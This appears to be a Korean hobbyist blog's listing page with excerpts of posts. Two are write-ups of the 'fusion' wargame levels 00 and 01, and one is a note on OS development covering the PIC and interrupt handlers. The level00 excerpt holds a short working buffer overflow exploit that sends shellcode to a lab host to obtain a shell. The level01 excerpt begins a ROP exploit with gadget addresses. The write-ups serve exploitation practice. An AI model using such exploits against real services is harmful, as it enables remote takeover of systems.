fusion level01 레벨0이랑 소스는 같은데 aslr이 추가되고 버퍼의 주소를 안알려줬다. 문제를 보고 그냥 바로 ROP를 해야겠다 생각해서 걍 ROP로 풀었었는데 풀고 다른 사람들의 풀이를 보니까 다 jmp esp 가젯을 이용해서 풀었더라.. jmp esp 가젯은 많이 사용해 본 적이 없어서 생각해 내지 못한 것 같다. 앞으로 또 써먹을 일이 있었으면 좋겠다. 12345678910111213141516171819202122232425262728293031323334from SunKn0wn import * r = remote('192.168.179.151', 20001) strcpy_plt = 0x080489A0leaveret = 0x8049853ppr = 0x08049A2Epopebpret = 0x8049a78bss = .. 더보기 fusion level00 간단한 bof 였다. NX가 걸려있지 않고 버퍼의 주소를 알기 때문에 쉘코드를 사용했다. 다만 realpath라는 함수의 용도를 모르겠어서 약간 헤멨었다.123456789101112from SunKn0wn import * r = remote('192.168.179.151', 20000)r.recvuntil('at 0x')buf = int(r.recv(8), 16)print "[*]buffer addr : " + str(hex(buf))payload = 'A' * 139payload += p32(buf + 144)payload += SocketShell32payload = 'GET ' + payload + ' HTTP/1.1'r.recvsend(payload)r.interactive()cs 더보기 OS 개발 13챕터 PIC를 컨트롤 하는 방법을 공부하고, 예외와 인터럽트에 대해서 핸들러들을 추가했다. PIC를 이용해서 하는 부분이 어렵고 헷갈렸지만 하드웨어를 제어하는 것 같아서 되게 신기했다. 빨리 콘솔 쉘을 만들어 보고 싶다. 더보기 이전 1 ··· 14 15 16 17 18 19 20 ··· 75 다음